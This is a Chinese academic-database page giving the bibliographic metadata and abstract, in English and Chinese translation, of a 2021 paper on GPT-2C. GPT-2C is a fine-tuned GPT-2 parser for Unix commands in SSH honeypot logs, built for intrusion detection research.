GPT-2C:使用大型预训练语言模型的蜜罐日志解析器

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos
{"title":"GPT-2C:使用大型预训练语言模型的蜜罐日志解析器","authors":"Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos","doi":"10.1145/3487351.3492723","DOIUrl":null,"url":null,"abstract":"Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.","PeriodicalId":320904,"journal":{"name":"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining","volume":"44 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2021-11-08","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"13","resultStr":"{\"title\":\"GPT-2C: a parser for honeypot logs using large pre-trained language models\",\"authors\":\"Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos\",\"doi\":\"10.1145/3487351.3492723\",\"DOIUrl\":null,\"url\":null,\"abstract\":\"Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.\",\"PeriodicalId\":320904,\"journal\":{\"name\":\"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining\",\"volume\":\"44 1\",\"pages\":\"0\"},\"PeriodicalIF\":0.0000,\"publicationDate\":\"2021-11-08\",\"publicationTypes\":\"Journal Article\",\"fieldsOfStudy\":null,\"isOpenAccess\":false,\"openAccessPdf\":\"\",\"citationCount\":\"13\",\"resultStr\":null,\"platform\":\"Semanticscholar\",\"paperid\":null,\"PeriodicalName\":\"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining\",\"FirstCategoryId\":\"1085\",\"ListUrlMain\":\"https://doi.org/10.1145/3487351.3492723\",\"RegionNum\":0,\"RegionCategory\":null,\"ArticlePicture\":[],\"TitleCN\":null,\"AbstractTextCN\":null,\"PMCID\":null,\"EPubDate\":\"\",\"PubModel\":\"\",\"JCR\":\"\",\"JCRName\":\"\",\"Score\":null,\"Total\":0}","platform":"Semanticscholar","paperid":null,"PeriodicalName":"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1145/3487351.3492723","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
引用次数: 13

摘要

蜜罐之类的欺骗技术会生成大量日志数据,其中包括潜在入侵者使用的非法Unix shell命令。一些先前的工作已经报告了克服网络级和程序级入侵检测系统(ids)的弱点的有希望的结果,通过混淆来自蜜罐的数据的网络流量。但是,由于蜜罐缺乏支持日志输出实时解析的插件基础设施,因此将非法Unix命令提供给下游预测分析仍然具有技术挑战性。因此,基于蜜罐的用户级入侵防御系统的进展仍然受到很大阻碍。本文介绍了一个运行时系统(GPT-2C),它利用一个大型预训练语言模型(GPT-2)来解析由一个实时的Cowrie SSH蜜罐实例生成的动态日志。在现有的非法Unix命令语料库上对GPT-2模型进行微调后,该模型在解析Unix命令时达到了89%的推理准确率,并且执行延迟是可以接受的。
本文章由计算机程序翻译,如有差异,请以英文原文为准。
查看原文
分享 分享
微信好友 朋友圈 QQ好友 复制链接
本刊更多论文
GPT-2C: a parser for honeypot logs using large pre-trained language models
Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.
求助全文
通过发布文献求助,成功后即可免费获取论文全文。 去求助
来源期刊
自引率
0.00%
发文量
0
期刊最新文献
Predicting COVID-19 with AI techniques: current research and future directions Predictions of drug metabolism pathways through CYP 3A4 enzyme by analysing drug-target interactions network graph An insight into network structure measures and number of driver nodes Temporal dynamics of posts and user engagement of influencers on Facebook and Instagram Vibe check: social resonance learning for enhanced recommendation
×
引用
GB/T 7714-2015
复制
MLA
复制
APA
复制
导出至
BibTeX EndNote RefMan NoteFirst NoteExpress
×
×
提示
您的信息不完整,为了账户安全,请先补充。
现在去补充
×
提示
您因"违规操作"
具体请查看互助需知
我知道了
×
提示
现在去查看 取消
×
提示
确定
0
微信
客服QQ
Book学术公众号 扫码关注我们
反馈
×
意见反馈
请填写您的意见或建议
请填写您的手机或邮箱
已复制链接
已复制链接
快去分享给好友吧!
我知道了
×
扫码分享
扫码分享
Book学术官方微信
Book学术文献互助
Book学术文献互助群
群 号:481959085
Book学术
文献互助 智能选刊 最新文献 互助须知 联系我们:info@booksci.cn
Book学术提供免费学术资源搜索服务,方便国内外学者检索中英文文献。致力于提供最便捷和优质的服务体验。
Copyright © 2023 Book学术 All rights reserved.
ghs 京公网安备 11010802042870号 京ICP备2023020795号-1